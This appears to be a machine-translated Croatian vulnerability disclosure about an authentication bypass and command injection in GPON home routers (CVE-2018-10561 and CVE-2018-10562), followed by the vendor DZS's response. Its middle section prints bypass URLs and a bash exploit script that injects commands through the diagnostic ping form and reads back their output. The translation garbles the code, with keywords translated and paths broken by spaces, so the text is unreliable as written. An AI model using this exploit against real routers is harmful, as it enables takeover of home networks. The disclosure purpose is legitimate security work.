Kritična RCE ranjivost pronađena u preko milijun GPON kućnih usmjerivača


Dvije važne novosti od objavljivanja ovog izvješća:

  1. Naš je istraživački tim stvorio zakrpu koja može pomoći učinkovitim korisnicima. Molimo provjerite ovdje
  2. DASAN Zhone Solutions poslao nam je svoj komentar na izvješće. Prilažemo ga „onakvog kakav je“ na kraju ove stranice

Pregled:

Proveli smo sveobuhvatnu procjenu na mnogim GPON kućnim usmjerivačima. Mnogi usmjerivači danas koriste GPON internet i pronašli smo način zaobići sve provjere autentičnosti na uređajima (CVE-2018-10.561). S ovim zaobilaznicom za provjeru autentičnosti, mogli smo otkriti i drugu ranjivost ubrizgavanja naredbe (CVE-2018-10.562) i izvršavati naredbe na uređaju.

iskorištavanje:

Tijekom naše analize upravljačkih programa GPON-a, otkrili smo dvije različite kritične ranjivosti (CVE-2018-10561 & CVE-2018-10562) koji bi u kombinaciji mogli omogućiti potpunu kontrolu uređaja i samim tim mreže. Prva ranjivost koristi mehanizam provjere autentičnosti uređaja koji ima nedostatak. Ova mana omogućuje bilo kojem napadaču da zaobiđe sve provjere autentičnosti.

Propust se može pronaći kod HTTP poslužitelja koji prilikom provjere autentičnosti provjeravaju određene staze. To omogućuje napadaču da zaobiđe autentifikaciju na bilo kojoj krajnjoj točki pomoću jednostavnog trika.

Dodavanjem slike? URL-u napadač može zaobići krajnju točku.

Ovo funkcionira i na HTML stranicama i na GponForm /

Na primjer, umetanjem

/menu.html?images/
ili
/ GponForm / diag_FORM? slika /

možemo upravljati uređajem.

Tijekom pregleda funkcionalnosti uređaja primijetili smo kako dijagnostička krajnja točka sadrži naredbe ping i traceroute. Nije bilo potrebno mnogo da shvatite da se naredbe mogu ubrizgati parametrom glavnog računala.

Budući da usmjerivač sprema ping rezultate u / tmp i prenosi ih korisniku kada korisnik ponovno pregleda /diag.html, izvršava naredbe i dovodi njihov izlaz pomoću ranjivosti zaobilazeći provjeru autentičnosti..

Uključujemo sljedeću bash verziju exploit koda:
#! / Bin / bash

odjek "[+] Slanje naredbe ..."
# Naredbe šaljemo s dva načina backtick (`) i zarezom (;), jer se različiti modeli aktiviraju na različitim uređajima
curl -k -d „XWebPageName = dijagnostika&diag_action = ping&wan_conlist = 0&dest_host = \ '$ 2 \'; $ 2&ipv = 0 ”$ 1 / GponForm / diag_Form? images / 2>/ dev / null 1>/ Dev / null
odjek "[+] Čekanje ..."
spavanje 3
odjek “[+] Dohvaćanje rezultata….”
curl -k $ 1 / diag.html? slike / 2>/ dev / null | grep 'diag_result =' | sed -e 's / \\ n / \ n / g'

Udarac:

GPON je vrsta pasivne optičke mreže koja koristi vlaknastu optiku i posebno je popularna. Kad ljudi koriste GPON, usmjerivače pružaju ISP-ovi. U videu to možete vidjeti preko milijun ljudi koristi ovu vrstu mrežnog usmjerivača.

Ovu ranjivost smo testirali na mnogim nasumičnim GPON usmjerivačima i ranjivost je pronađena na svima njima. Jer toliko ljudi koristi ove vrste usmjerivača, ova ranjivost može rezultirati kompromisom cijele mreže.

preporuke:

  1. Provjerite koristi li vaš usmjerivač GPON mrežu.
  2. Imajte na umu da GPON usmjerivači mogu biti hakirani i iskorišteni.
  3. Razgovarajte sa svojim davateljem internetskih usluga da biste vidjeli što mogu učiniti kako bi popravili bugu.
  4. Upozorite svoje prijatelje na Facebooku (kliknite ovdje za dijeljenje) i Twitteru (kliknite ovdje za tweet).

Ažuriranje: Izjava iz DZS-a u vezi s iskorištavanjem obilaženja provjere autentičnosti

DASAN Zhone Solutions, Inc. istraživao je nedavna medijska izvješća da bi određeni DZS GPON mrežni interfejs uređaji (NID-ovi), poznatiji kao usmjerivači, mogli biti ranjivi na iskorištavanje zaobilaznice za provjeru identiteta.

DZS je utvrdio da je na ovu ranjivost pogođena serija ZNID-GPON-25xx i određeni H640series GPON ONT-ovi, kada rade na određenim izdanjima softvera. Do danas nije prijavljen utjecaj usluga od ove ranjivosti u DZS. Nakon interne istrage, utvrdili smo da je potencijalni učinak znatno ograničeniji u odnosu na opseg vpnMentor. Prema evidencijama o prodaji DZS-a, u kombinaciji s podacima do danas prikupljenim na terenu, procijenili smo da broj GPON ONT jedinica može biti potencijalno utjecati na manje od 240 000. Uz to, s obzirom na relativnu zrelost proizvoda u njihovom životnom ciklusu, mislimo da je utjecaj ograničen na još manje uređaja.

Povijest proizvoda

DZS ZNID-GPON-25xx i određeni ONT-ovi serije H640, uključujući softver koji je uveo ovu ranjivost, razvili su OEM dobavljači, a DZS ih je preprodao. Dizajnirani i pušteni prije više od 9 godina, većina ovih proizvoda već je prošla njihov održivi vijek trajanja. Budući da se ugovori o softverskoj podršci više ne nude za većinu ovih proizvoda, nemamo izravan uvid u ukupni broj jedinica koje se i dalje aktivno koriste na terenu.

rezolucija

DZS je obavijestio sve kupce koji su kupili ove modele o ranjivosti. Radimo sa svakim kupcem kako bismo im pomogli u procjeni metoda za rješavanje problema za jedinice koje su možda još uvijek instalirane na terenu. Svaki će kupac odlučivati ​​o načinu na koji će riješiti stanje svoje razmještene opreme.

DZS-ova misija je osigurati da sva njegova rješenja udovoljavaju najvišim sigurnosnim standardima u industriji. Prihvaćamo ovu i svaku priliku za pregled i kontinuirano poboljšavanje sigurnosnih dizajnerskih i testnih metodologija.

Brayan Jackson
Brayan Jackson Administrator
Sorry! The Author has not filled his profile.
follow me